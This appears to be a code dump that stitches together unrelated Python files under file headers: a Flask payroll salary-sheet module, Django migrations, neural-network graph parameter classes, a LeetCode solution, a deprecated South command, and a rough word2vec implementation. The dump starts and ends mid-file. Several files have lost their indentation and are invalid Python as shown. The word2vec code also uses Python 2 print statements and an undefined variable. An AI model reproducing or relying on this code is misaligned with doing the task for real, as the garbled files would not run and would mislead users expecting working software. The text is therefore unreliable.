                print(str(e))
                return jsonify({'message': 'Data not entered for required company & month.'})
@bp.route('/salary_sheet/get/processed', methods=['POST'])
def get_processed_sheet():
    payload = request.json
    if payload is not None:
        payload_date = payload['date'].split('-')
        payload_date = datetime(
            int(payload_date[0]), int(payload_date[1]), int(1))
        check_data = SalarySheet.query.filter(SalarySheet.company.any(Company.id == int(payload['company'])),
                                              SalarySheet.month == payload_date).first()
        if check_data is not None:
            saved_data = SalarySheetSlips.query.filter(
                SalarySheetSlips.sheet.any(SalarySheet.id == int(check_data.id))).all()
            try:
                generate_data = json.loads(generate_sheet(
                    payload['company'], payload['date']).data)
                for item in generate_data:
                    for slip in saved_data:
                        if (item['employee'][0]['id'] == slip.employee[0].id):
                            item['net_adv_deduction'] = slip.adv_deduction
                json_data = json.dumps(generate_data)
                return jsonify({'data': json_data})
            except Exception as e:
                print(str(e))
                return jsonify({'message': 'Data not entered for required company & month.'})
        else:
            return jsonify({'data': None})
def generate_sheet(company, month):
    # Payload Date from User
    payload_date = month.split('-')
    payload_date = datetime(
        int(payload_date[0]), int(payload_date[1]), int(1))
    # Attendence data for company and month
    att_data = Attendence.query.filter(
        Attendence.company.any(Company.id == int(company)), Attendence.date == payload_date).all()
    # For year range
    today = payload_date
    year_start = datetime(today.year, 1, 1)
    year_end = datetime(today.year + 1, 1, 1)
    att_data_schema = AttendenceSchema(many=True)
    json_att_data = json.loads(att_data_schema.dumps(att_data))
    adv_data_schema = AdvanceSchema(many=True)
    att_rules = AttendenceRules.query.first()
    # e.g. if late_comin_day = 0.5 day is docked per late_comin = 3 late
    # arrivals, each late arrival costs 0.5 / 3 of a day's pay.
    late_comin_ratio = float(
        att_rules.late_comin_day / att_rules.late_comin)
    early_going_ratio = float(
        att_rules.early_going_day / att_rules.early_going)
    for att_item in json_att_data:
        att_item['advance'] = []
        att_item['deductions'] = {}
        att_item['deductions']['month'] = []
        att_item['days_payable_late'] = late_comin_ratio * \
            att_item['latecomin']
        att_item['days_payable_early'] = early_going_ratio * \
            att_item['earlygoing']
        att_item['days_payable'] = round(
            att_item['daysatt'] - (att_item['days_payable_late'] + att_item['days_payable_early']), 2)
        att_item['pay_1'] = float(
            att_item['days_payable']) * (float(att_item['employee'][0]['basicpay']) / 30)
        att_item['deductions']['year'] = []
        # Includes deduction from the month
        adv_data = Advance.query.filter(
            Advance.employee.any(Employee.id == int(att_item['employee'][0]['id']))).all()
        json_adv_data = json.loads(adv_data_schema.dumps(adv_data))
        net_advance_month = 0
        net_advance_year = 0
        net_deduction_month = 0
        net_deduction_year = 0
        outstanding_advance = float(0)
        for item in adv_data:
            if (item.trans == 'credit'):
                outstanding_advance += float(item.advanceamt)
            elif (item.trans == 'debit'):
                outstanding_advance -= float(item.advanceamt)
        for adv_item in json_adv_data:
            if adv_item['deduction_period'] == 'month':
                net_advance_month += float(adv_item['advanceamt'])
                net_deduction_month += float(adv_item['deduction'])
                # net_advance += float(-100)
                att_item['deductions']['month'].append(
                    adv_item['deduction'])
            if adv_item['deduction_period'] == 'year':
                if payload_date.month == 12:
                    net_advance_year += float(adv_item['advanceamt'])
                    net_deduction_year += float(adv_item['deduction'])
                    # net_advance += float(-100)
                    att_item['deductions']['year'].append(
                        adv_item['deduction'])
        if net_advance_month > net_deduction_month:
            pass
        elif net_advance_month <= net_deduction_month:
            att_item['deductions']['month'] = [net_advance_month]
        if net_advance_year > net_deduction_year:
            pass
        elif net_advance_year <= net_deduction_year:
            att_item['deductions']['year'] = [net_advance_year]
        # Setting to 0 if balance is 0
        if float(net_advance_month) == float(0):
            att_item['deductions']['month'] = 0
        if float(net_advance_year) == float(0):
            att_item['deductions']['year'] = 0
        if att_item['other_deduction'] is None:
            att_item['other_deduction'] = float(0)
        if att_item['esi'] is None:
            att_item['esi'] = float(0)
        if att_item['pf'] is None:
            att_item['pf'] = float(0)
        if att_item['tds'] is None:
            att_item['tds'] = float(0)
        att_item['net_deduction_month'] = float(net_deduction_month)
        att_item['net_deduction_year'] = float(net_deduction_year)
        net_deduction_advance = float(
            net_deduction_month) + float(net_deduction_year)
        if outstanding_advance <= net_deduction_advance:
            att_item['net_adv_deduction'] = outstanding_advance
        else:
            att_item['net_adv_deduction'] = net_deduction_advance
        att_item['total_deductions'] = float(net_deduction_month) + float(att_item['esi']) + float(att_item['pf']) + float(
            att_item['tds']) + float(att_item['other_deduction']) + float(att_item['net_deduction_year'])
        att_item['net_payable'] = float(
            att_item['pay_1'] - att_item['total_deductions'])
    return jsonify(json_att_data)
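# Illustrative request for the /salary_sheet/generate route above (the URL
# prefix depends on how the `bp` blueprint is registered):
#   POST .../salary_sheet/generate  with JSON body {"company": "1", "month": "2021-06"}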
# ===== /blog/migrations/0001_initial.py (repo: Maxpridy/practicedjango, license: none, UTF-8, Python, 1,051 bytes) =====
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-04-10 05:50
from __future__ import unicode_literals

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone


class Migration(migrations.Migration):

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        migrations.CreateModel(
            name='Post',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=200)),
                ('text', models.TextField()),
                ('created_date', models.DateTimeField(default=django.utils.timezone.now)),
                ('published_date', models.DateTimeField(blank=True, null=True)),
                ('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
# ===== /tools/nntool/graph/types/others.py (repo: VishalSharma0309/gap_sdk, licenses: AGPL-3.0-or-later / AGPL-3.0-only / GPL-1.0-or-later / LicenseRef-scancode-other-copyleft / Apache-2.0, UTF-8, Python, 21,578 bytes) =====
# Copyright (C) 2020 GreenWaves Technologies, SAS
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
import logging
import sys
import numpy as np
from graph.dim import Dim
from utils.formatters import FORMAT_CHANGES, NORMALIZATIONS
from .base import (NoSizeChangeParameters, Parameters,
                   SameNumberOfDimensionsForInputs, SensitiveToOrder,
                   SingleInputAndOutput, Transposable)
LOG = logging.getLogger("nntool." + __name__)
class InputOutputParameters(Transposable):

    def __init__(self, *args, dims=None, fixed_order=False, **kwargs):
        super().__init__(*args, **kwargs)
        self._output_value = None
        self._index = None
        self.dims = dims
        self.fixed_order = fixed_order
        self.at_options.valid_options['ALLOCATE'] = int
        self.at_options.valid_options['FIXED_ORDER'] = int
        self.at_options.fixed_order = 0

    @property
    def fixed_order(self):
        return self.at_options.fixed_order == 1

    @fixed_order.setter
    def fixed_order(self, val):
        self.at_options.fixed_order = 1 if val else 0

    @property
    def output_value(self):
        return self._output_value

    @output_value.setter
    def output_value(self, value):
        self._output_value = value

    @property
    def index(self):
        return self._index

    @index.setter
    def index(self, value):
        self._index = value

    @property
    def can_equalize(self):
        return False

    def get_parameter_size(self):
        return 0

    def clone(self, name, groupn=None):
        raise NotImplementedError()


class InputBaseParameters(InputOutputParameters):

    @property
    def in_dims(self):
        dim = self.dims.clone()
        if self.in_dims_hint:
            dim.apply_naming_hints(self.in_dims_hint[0])
        return [dim]

    @in_dims.setter
    def in_dims(self, val):
        pass

    def __str__(self):
        return "I {} {} {}".format(
            self.dims,
            Transposable.__str__(self),
            self.at_options
        )

    def get_output_size(self, _):
        out_dim = self.dims.clone()
        if self.transpose_out:
            out_dim.transpose(self.transpose_out)
        if self.out_dims_hint:
            out_dim.apply_naming_hints(self.out_dims_hint[0])
        return [out_dim]


class InputParameters(InputBaseParameters):
    op_name = "input"

    def set_input(self, value):
        try:
            value = value.reshape(self.dims.shape)
        except ValueError as ex:
            trace_back = sys.exc_info()[2]
            raise ValueError(
                "Input data dimensions are not compatible with graph input: {!s}".format(ex)
            ).with_traceback(trace_back)
        self.output_value = value

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    # @property
    # def can_promoteq(self):
    #     return self.out_q.bits < STATS_BITS[-1]

    # def promoteq(self):
    #     if self.out_q.bits == STATS_BITS[-1]:
    #         raise ValueError("can't step further")
    #     self.out_q = get_quantization(self.activation_stats, None, self.out_q.bits * 2)
    #     return True


class ImageFormatParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
    op_name = "image_format"
    NORMALIZATIONS = NORMALIZATIONS
    FORMAT_CHANGES = FORMAT_CHANGES

    def __init__(self, *args, norm_func=None, format_change=None, **kwargs):
        self._norm_func = None
        self._format_change = None
        super(ImageFormatParameters, self).__init__(*args, **kwargs)
        self.norm_func = norm_func
        self.format_change = format_change

    @property
    def input_channels(self):
        if self.format_change in ("RGB565_RGB888", "BW8", "BW16"):
            return 1
        if self.format_change in ("RGB888", "RGB16"):
            return 3
        return None

    @property
    def input_dtype(self):
        if self.format_change == "RGB565_RGB888":
            return np.uint16
        if self.format_change in ("RGB888", "BW8", "BW16", "RGB16"):
            return np.uint8
        return None

    @property
    def output_channels(self):
        if self.format_change in ("RGB565_RGB888", "RGB888", "RGB16"):
            return 3
        if self.format_change in ("BW8", "BW16"):
            return 1
        return None

    @property
    def output_dtype(self):
        if self.norm_func in ("SHIFT_INT8", "OFFSET_INT8"):
            return np.int8
        if self.norm_func in "OUT_INT16":
            return np.int16
        return None

    @property
    def format_change(self):
        # RGB565_RGB888
        return self._format_change

    @format_change.setter
    def format_change(self, val):
        val = val and val.upper()
        if val is not None and val not in self.FORMAT_CHANGES:
            raise ValueError("format change is not valid")
        self._format_change = val

    @property
    def norm_func(self):
        # None, "shift", "offset"
        return self._norm_func

    @norm_func.setter
    def norm_func(self, val):
        val = val and val.upper()
        if val is not None and val not in self.NORMALIZATIONS:
            raise ValueError("normalization is not valid")
        self._norm_func = val

    def get_parameter_size(self):
        return 0

    def get_output_size(self, in_dims):
        assert len(in_dims) == 1
        self.in_dims = self.clone_dim_with_hints(in_dims, hint_dir='in')
        out_dim = self.clone_dim_with_hints(in_dims, hint_dir='out')[0]
        if self.format_change == "RGB565_RGB888":
            assert out_dim.is_named and out_dim.c == 1
            out_dim.impose_order(self.out_dims_hint[0])
            out_dim.c = 3
        elif self.format_change in ("BW8", "BW16"):
            assert out_dim.is_named and out_dim.c == 1
            out_dim.impose_order(self.out_dims_hint[0])
        elif self.format_change in ("RGB888", "RGB16"):
            assert out_dim.is_named and out_dim.c == 3
            out_dim.impose_order(self.out_dims_hint[0])
        else:
            raise ValueError("unknown format change")
        return [out_dim]

    @property
    def can_equalize(self):
        return False

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "FORMAT_CHANGE Fmt: {} Norm: {}".format(self.format_change, self.norm_func)


class ConstantInputParameters(InputBaseParameters):
    op_name = "constant"

    def __init__(self, *args, **kwargs):
        self.value = None
        super(ConstantInputParameters, self).__init__(*args, **kwargs)

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def get_parameter_size(self):
        return self.dims.size()

    def get_parameters(self):
        return {'value': self.value}

    def set_parameters(self, val):
        self.value = val['value']

    def __str__(self):
        return "Const {} {} {}".format(
            self.dims,
            Transposable.__str__(self),
            self.at_options
        )


class OutputParameters(InputOutputParameters):
    op_name = "output"

    def __init__(self, *args, **kwargs):
        super(OutputParameters, self).__init__(*args, **kwargs)

    def get_output_size(self, in_dims):
        out_dim = in_dims[0].clone()
        if self.transpose_in:
            out_dim.transpose(self.transpose_in)
        return [out_dim]

    @property
    def out_dims(self):
        return [self.dims]

    @out_dims.setter
    def out_dims(self, val):
        self.dims = val[0]

    def __str__(self):
        return "O {} {} {}".format(
            self.dims,
            Transposable.__str__(self),
            self.at_options
        )

    def clone(self, name, groupn=None):
        raise NotImplementedError()


class TransposeParameters(Transposable, SingleInputAndOutput):
    op_name = "transpose"

    def __init__(self, *args, transpose=None, **kwargs):
        super(TransposeParameters, self).__init__(*args, **kwargs)
        self.transpose_in = transpose

    def get_parameter_size(self):
        return 0

    def permute(self, val):
        return [val[i] for i in self.transpose_in]

    @property
    def can_equalize(self):
        return False

    def real_shape(self):
        input_shape = self.in_dims[0].shape
        cond_input_idx = [i for i, sz in enumerate(self.in_dims[0].shape) if sz != 1]
        real_transpose = [i for i in self.transpose_in if i in cond_input_idx]
        cond_input_shape = [input_shape[i] for i in cond_input_idx]
        cond_transpose = [cond_input_idx.index(i) for i in real_transpose]
        return tuple(cond_input_shape), tuple(cond_transpose)
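    # Example (illustrative): for an input shape (1, 4, 1, 3) with
    # transpose_in = (0, 3, 2, 1), the size-1 axes are dropped, so
    # real_shape() returns ((4, 3), (1, 0)).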
    @property
    def transpose_dimension(self):
        if self._transpose_in is None:
            return 1
        return len(self.transpose_in)

    @property
    def transpose_out(self):
        return self._transpose_in

    @transpose_out.setter
    def transpose_out(self, val):
        self._transpose_in = val

    def get_output_size(self, in_dims):
        self.in_dims = self.clone_dim_with_hints(in_dims)
        out_dim = in_dims[0].clone()
        if self.transpose_in:
            out_dim = out_dim.transpose(self.transpose_in)
        return [out_dim]

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "T {} {}".format(
            self.transpose_in and ','.join([str(i) for i in self.transpose_in]) or "None",
            self.at_options
        )


class ConcatParameters(Transposable):
    op_name = "concat"

    def __init__(self, *args, axis=None, axis_hint=None, **kwargs):
        super(ConcatParameters, self).__init__(*args, **kwargs)
        self._axis = axis
        self._axis_hint = axis_hint

    @property
    def axis(self):
        return self._axis

    @axis.setter
    def axis(self, val):
        self._axis = val

    def get_parameter_size(self):
        return 0

    @property
    def can_equalize(self):
        return False

    def get_output_size(self, in_dims):
        if in_dims[0].is_named and self._axis_hint:
            self._axis = in_dims[0].get_order_idx(self._axis_hint)
        self.in_dims = self.clone_dim_with_hints(in_dims)
        if self.transpose_in:
            in_dims = [in_dim.clone().transpose(self.transpose_in) for in_dim in in_dims]
        out_dim = Dim.combine([in_dim for in_dim in in_dims], self.axis)
        if self.transpose_out:
            out_dim.transpose(self.transpose_out)
        return [out_dim]

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "A {} {} {}".format(
            self.axis,
            Transposable.__str__(self),
            self.at_options
        )


class GroupParameters(Parameters, SensitiveToOrder):
    op_name = "group"

    def __init__(self, name, groups, in_dims_hint=None, out_dims_hint=None):
        super(GroupParameters, self).__init__(name,
                                              in_dims_hint=in_dims_hint,
                                              out_dims_hint=out_dims_hint)
        self.groups = groups

    def get_parameter_size(self):
        return 0

    def get_output_size(self, in_dims):
        assert len(in_dims) == 1
        self.in_dims = self.clone_dim_with_hints(in_dims)
        in_dims = self.in_dims[0]
        assert in_dims.c % self.groups == 0
        out_edges = in_dims.c // self.groups
        out_c = in_dims.c // out_edges
        out_dim = in_dims.clone(['c', 'h', 'w'])
        out_dim.c = out_c
        out_dim.impose_order(in_dims.order)
        return [out_dim]

    @property
    def can_equalize(self):
        return False

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "GRPS {}".format(
            self.groups
        )


class PadParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
    op_name = "pad"

    def __init__(self, name, padding, in_dims_hint=None, out_dims_hint=None):
        super(PadParameters, self).__init__(name,
                                            in_dims_hint=in_dims_hint,
                                            out_dims_hint=out_dims_hint)
        self.padding = padding
        self.pad_type = "zero"

    def get_parameter_size(self):
        return 0

    def get_output_size(self, in_dims):
        assert len(in_dims) == 1
        self.in_dims = self.clone_dim_with_hints(in_dims)
        out_dim = self.in_dims[0].clone()
        out_dim.w += self.padding.w
        out_dim.h += self.padding.h
        return [out_dim]

    @property
    def can_equalize(self):
        return True

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "PAD {}".format(self.padding)


class GlobalPoolParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
    op_name = "global"

    def __init__(self, name, pool_type="average", in_dims_hint=None, out_dims_hint=None):
        super(GlobalPoolParameters, self).__init__(name,
                                                   in_dims_hint=in_dims_hint,
                                                   out_dims_hint=out_dims_hint)
        self.pool_type = pool_type

    def get_parameter_size(self):
        return 0

    def get_output_size(self, in_dims):
        assert len(in_dims) == 1
        self.in_dims = self.clone_dim_with_hints(in_dims)
        out_dim = self.in_dims[0].clone()
        out_dim.w = 1
        out_dim.h = 1
        return [out_dim]

    @property
    def can_equalize(self):
        return True

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "GLOBAL {}".format(self.pool_type)


class UpsampleParameters(Parameters, SingleInputAndOutput, SensitiveToOrder):
    op_name = "upsample"

    def __init__(self, name, algo, factor, in_dims_hint=None, out_dims_hint=None):
        super(UpsampleParameters, self).__init__(name,
                                                 in_dims_hint=in_dims_hint,
                                                 out_dims_hint=out_dims_hint)
        self.algo = algo
        self.factor = factor

    def get_parameter_size(self):
        return 0

    def get_output_size(self, in_dims):
        assert len(in_dims) == 1
        self.in_dims = self.clone_dim_with_hints(in_dims)
        in_dims = in_dims[0]
        out_dim = in_dims.clone()
        out_dim = out_dim * self.factor
        out_dim.impose_order(in_dims.order)
        return [out_dim]

    @property
    def can_equalize(self):
        return False

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "A {} factor {}".format(
            self.algo,
            self.factor
        )


class ReshapeParameters(Transposable, SingleInputAndOutput):
    '''This class covers reshapes and transposes'''

    op_name = "reshape"

    def __init__(self, *args, old_shape=None, shape=None, **kwargs):
        super(ReshapeParameters, self).__init__(*args, **kwargs)
        if not isinstance(shape, Dim):
            shape = Dim.unnamed(shape)
        self._shape = shape
        self._old_shape = old_shape

    def does_nothing(self):
        return self.shape.layout_shape == self.old_shape.layout_shape

    def get_parameter_size(self):
        return 0

    def get_output_size(self, in_dims):
        assert len(in_dims) == 1
        self.in_dims = self.clone_dim_with_hints(in_dims)
        in_dim = in_dims[0]
        self._old_shape = in_dim
        assert in_dim.size() == self.shape.size(), "in shape does not match in size"
        out = self.shape.clone()
        if self.transpose_out:
            out.transpose(self.transpose_out)
        return [out]

    @property
    def shape(self):
        return self._shape

    @shape.setter
    def shape(self, val):
        self._shape = val

    @property
    def old_shape(self):
        return self._old_shape

    @old_shape.setter
    def old_shape(self, val):
        self._old_shape = val

    @property
    def can_equalize(self):
        return False

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "SHAPE {} {}".format(
            self.shape,
            Transposable.__str__(self)
        )


class YoloParameters(NoSizeChangeParameters, SingleInputAndOutput, SensitiveToOrder):
    op_name = "yolo"

    def __init__(self, name, classes, total, mask, max_boxes):
        super(YoloParameters, self).__init__(name)
        self.classes = classes
        self.total = total
        self.mask = mask
        self.max_boxes = max_boxes

    def get_parameter_size(self):
        return 0

    @property
    def can_equalize(self):
        return False

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "C {} T {} MSK {} MAX {}".format(
            self.classes, self.total, self.mask, self.max_boxes
        )


class MatrixBroadcastedLinearOpParameters(Parameters, SameNumberOfDimensionsForInputs):
    @property
    def can_equalize(self):
        return False

    def get_parameter_size(self):
        return 0

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def compute_load(self):
        return self.out_dims[0].size() * 2

    def get_output_size(self, in_dims):
        self.in_dims = self.clone_dim_with_hints(in_dims)
        max_idx, _ = max(enumerate(self.in_dims), key=lambda x: x[1].size())
        return [self.in_dims[max_idx]]

    def __str__(self):
        return "{} {}".format(self.op_name, self.at_options)


class MatrixAddParameters(MatrixBroadcastedLinearOpParameters):
    op_name = "add"


class MatrixMulParameters(MatrixBroadcastedLinearOpParameters):
    op_name = "mul"


class MatrixSubParameters(MatrixBroadcastedLinearOpParameters):
    op_name = "sub"


class MatrixDivParameters(MatrixBroadcastedLinearOpParameters):
    op_name = "div"


class SoftMaxParameters(NoSizeChangeParameters, SingleInputAndOutput, SensitiveToOrder):
    op_name = "softmax"

    def __init__(self, name, beta):
        super(SoftMaxParameters, self).__init__(name)
        self.beta = beta

    def get_parameter_size(self):
        return 0

    @property
    def can_equalize(self):
        return False

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def compute_load(self):
        return self.in_dims[0].size() * 2

    def __str__(self):
        return "BETA {} {}".format(
            self.beta,
            self.at_options
        )


# pylint: disable=abstract-method
class NoOPParameters(NoSizeChangeParameters, SingleInputAndOutput):
    op_name = "noop"

    def __init__(self, name, desc=""):
        super(NoOPParameters, self).__init__(name)
        self._desc = desc

    def get_parameter_size(self):
        return 0

    @property
    def can_equalize(self):
        return False

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def compute_load(self):
        return 0

    def __str__(self):
        return "NOOP {}".format(
            self._desc
        )


class UnexecutableOpParameters(Parameters):
    pass


class UnconvertedOpParameters(UnexecutableOpParameters):
    def __init__(self, name, indicated_op_name, expected_inputs, indicated_outputs, info):
        super(UnconvertedOpParameters, self).__init__(name)
        self.info = info
        self.expected_inputs = expected_inputs
        self.indicated_outputs = indicated_outputs
        self.indicated_op_name = indicated_op_name

    @property
    def op_name(self):
        return self.indicated_op_name

    def get_output_size(self, in_dims):
        if self.indicated_outputs:
            return self.indicated_outputs
        self.in_dims = self.clone_dim_with_hints(in_dims)
        if len(self.in_dims) == 1:
            return [self.in_dims[0]]
        return [Dim.unknown()]

    @property
    def can_equalize(self):
        return False

    def get_parameter_size(self):
        return 0

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return self.indicated_op_name


class UnknownOpParameters(UnexecutableOpParameters):
    def __init__(self, name, info):
        super(UnknownOpParameters, self).__init__(name)
        self.info = info

    def get_output_size(self, in_dims):
        self.in_dims = self.clone_dim_with_hints(in_dims)
        if len(self.in_dims) == 1:
            return [self.in_dims[0]]
        return [Dim.unknown()]

    @property
    def can_equalize(self):
        return False

    def get_parameter_size(self):
        return 0

    def clone(self, name, groupn=None):
        raise NotImplementedError()

    def __str__(self):
        return "Unknown"
# ======================================================================
# File: /products/migrations/0001_initial.py  (repo: lesproduweb/africanStore)
# ======================================================================
# Generated by Django 3.2.4 on 2021-06-30 06:58
from django.db import migrations, models
import products.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Product',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=120)),
('slug', models.SlugField(blank=True, unique=True)),
('description', models.TextField()),
('price', models.DecimalField(decimal_places=2, default=39.99, max_digits=20)),
('image', models.ImageField(blank=True, null=True, upload_to=products.models.upload_image_path)),
('featured', models.BooleanField(default=False)),
('active', models.BooleanField(default=True)),
('timestamp', models.TimeField(auto_now=True)),
],
),
]
# ======================================================================
# File: /array/128.py  (repo: MingfeiPan/leetcode, license: Apache-2.0)
# ======================================================================
# The for + while pair looks like two nested loops, but the while loop only
# starts at a number whose predecessor (num - 1) is absent from the set, so
# each element is visited a constant number of times: O(n) overall.
from typing import List
class Solution:
def longestConsecutive(self, nums: List[int]) -> int:
num_set = set(nums)
ret = 0
for num in num_set:
if num - 1 not in num_set:
cur_len = 1
while num + 1 in num_set:
cur_len += 1
num += 1
ret = max(ret, cur_len)
return ret
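# Worked example (hypothetical input): for nums = [100, 4, 200, 1, 3, 2] only
# 1 starts a run (0 is absent from the set); the while loop extends it through
# 2, 3 and 4, so longestConsecutive returns 4.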
# ======================================================================
# File: /venv/lib/python3.7/site-packages/south/management/commands/startmigration.py
# (repo: r34g4n/ADT_booking, license: Apache-2.0)
# ======================================================================
"""
Now-obsolete startmigration command.
"""
from __future__ import print_function
from optparse import make_option
from django.core.management.base import BaseCommand
from django.core.management.color import no_style
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--model', action='append', dest='added_model_list', type='string',
help='Generate a Create Table migration for the specified model. Add multiple models to this migration with subsequent --add-model parameters.'),
make_option('--add-field', action='append', dest='added_field_list', type='string',
help='Generate an Add Column migration for the specified modelname.fieldname - you can use this multiple times to add more than one column.'),
make_option('--add-index', action='append', dest='added_index_list', type='string',
help='Generate an Add Index migration for the specified modelname.fieldname - you can use this multiple times to add more than one column.'),
make_option('--initial', action='store_true', dest='initial', default=False,
help='Generate the initial schema for the app.'),
make_option('--auto', action='store_true', dest='auto', default=False,
help='Attempt to automatically detect differences from the last migration.'),
make_option('--freeze', action='append', dest='freeze_list', type='string',
help='Freeze the specified model(s). Pass in either an app name (to freeze the whole app) or a single model, as appname.modelname.'),
make_option('--stdout', action='store_true', dest='stdout', default=False,
help='Print the migration to stdout instead of writing it to a file.'),
)
help = "Deprecated command"
def handle(self, app=None, name="", added_model_list=None, added_field_list=None, initial=False, freeze_list=None, auto=False, stdout=False, added_index_list=None, **options):
print("The 'startmigration' command is now deprecated; please use the new 'schemamigration' and 'datamigration' commands.")
# ======================================================================
# File: /numpy_implementation_rough.py
# (repo: Ayushi20023/Training-domain-specific-word-embeddings, license: Apache-2.0)
# ======================================================================
import argparse
import math
import struct
import sys
import time
import warnings
import pickle
import string
from bs4 import BeautifulSoup
from nltk.tokenize import word_tokenize
from nltk.corpus import stopwords
import numpy as np
import matplotlib.pyplot as plt
from scipy import spatial
from sklearn.manifold import TSNE
from multiprocessing import Array
from bs4 import BeautifulSoup
class VocabItem:
def __init__(self, word):
self.word = word
self.count = 0
self.path = None # Path (list of indices) from the root to the word (leaf)
self.code = None # Huffman encoding
class Vocab:
def __init__(self, fi, min_count):
vocab_items = []
vocab_hash = {}
word_count = 0
fi = open(fi, 'r')
# Add special tokens <bol> (beginning of line) and <eol> (end of line)
for token in ['<bol>', '<eol>']:
vocab_hash[token] = len(vocab_items)
vocab_items.append(VocabItem(token))
for line in fi:
tokens = line.split()
for token in tokens:
if token not in vocab_hash:
vocab_hash[token] = len(vocab_items)
vocab_items.append(VocabItem(token))
# assert vocab_items[vocab_hash[token]].word == token, 'Wrong vocab_hash index'
vocab_items[vocab_hash[token]].count += 1
word_count += 1
if word_count % 10000 == 0:
sys.stdout.write("\rReading word %d" % word_count)
sys.stdout.flush()
# Add special tokens <bol> (beginning of line) and <eol> (end of line)
vocab_items[vocab_hash['<bol>']].count += 1
vocab_items[vocab_hash['<eol>']].count += 1
word_count += 2
self.bytes = fi.tell()
self.vocab_items = vocab_items # List of VocabItem objects
self.vocab_hash = vocab_hash # Mapping from each token to its index in vocab
self.word_count = word_count # Total number of words in train file
# Add special token <unk> (unknown),
# merge words occurring less than min_count into <unk>, and
# sort vocab in descending order by frequency in train file
self.__sort(min_count)
# assert self.word_count == sum([t.count for t in self.vocab_items]), 'word_count and sum of t.count do not agree'
print 'Total words in training file: %d' % self.word_count
print 'Total bytes in training file: %d' % self.bytes
print 'Vocab size: %d' % len(self)
def __getitem__(self, i):
return self.vocab_items[i]
def __len__(self):
return len(self.vocab_items)
def __iter__(self):
return iter(self.vocab_items)
def __contains__(self, key):
return key in self.vocab_hash
def __sort(self, min_count):
tmp = []
tmp.append(VocabItem('<unk>'))
unk_hash = 0
count_unk = 0
for token in self.vocab_items:
if token.count < min_count:
count_unk += 1
tmp[unk_hash].count += token.count
else:
tmp.append(token)
tmp.sort(key=lambda token: token.count, reverse=True)
# Update vocab_hash
vocab_hash = {}
for i, token in enumerate(tmp):
vocab_hash[token.word] = i
self.vocab_items = tmp
self.vocab_hash = vocab_hash
print
print 'Unknown vocab size:', count_unk
def get_key(self, i):
return self.vocab_hash.keys()[list(self.vocab_hash.values()).index(i)]
def indices(self, tokens):
return [self.vocab_hash[token] if token in self else self.vocab_hash['<unk>'] for token in tokens]
def domain_corpus(di):
f = open(di).read().lower().split()
domain_word_list = set()
for word in f:
domain_word_list.add(word)
return(domain_word_list)
class UnigramTable1:
def __init__(self, vocab):
#unigram table for (w,c) both belonging to domain_vocab
pie = 0.5
smoothing_parameter = 0.75
xs = np.random.uniform(low=0, high=1)
table_size = 1e8
domain_vocab = domain_corpus(di)
table1 = np.zeros(table_size, dtype=np.uint32)
if xs < pie:
norm = len(domain_vocab)
#norm = float(sum([math.pow(c.count, smoothing_parameter)for c in vocab]))
print 'Filling the unigram table for case1'
p = 0 #Cumulative probability for case1
i = 0
for j, unigram in enumerate(vocab):
p += float(math.pow(unigram.count, smoothing_parameter)) / norm
while i < table_size and float(i) / table_size < p:
table1[i] = j
i += 1
self.table1 = table1
else:
norm = float(sum([math.pow(t.count, smoothing_parameter) for t in domain_vocab]))
print 'Filling the unigram table for case1'
p = 0 # Cumulative probability for case1
i = 0
for j, unigram in enumerate(vocab):
p += float(math.pow(unigram.count, smoothing_parameter)) / norm
while i < table_size and float(i) / table_size < p:
table1[i] = j
i += 1
self.table1 = table1
# This is used as the sample to pick the neagtive samples
def sample(self, count):
indices = np.random.randint(low=0, high=len(self.table1), size=count)
return [self.table1[i] for i in indices]
class UnigramTable2:
def __init__(self, vocab):
vocab_size = len(vocab)
power = 0.75
norm = sum([math.pow(t.count, power) for t in vocab])
table_size = 1e8 # Length of the unigram table
table2 = np.zeros(table_size, dtype=np.uint32)
print 'Filling the unigram table for case2'
p = 0 # Cumulative probability
i = 0
for j, unigram in enumerate(vocab):
p += float(math.pow(unigram.count, power)) / norm
while i < table_size and float(i) / table_size < p:
table2[i] = j
i += 1
self.table2 = table2
def sample(self, count):
iters = np.random.randint(low=0, high=len(self.table2), size=count)
return [self.table2[i] for i in iters]
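# Both tables realize word2vec's smoothed unigram negative sampling: each word
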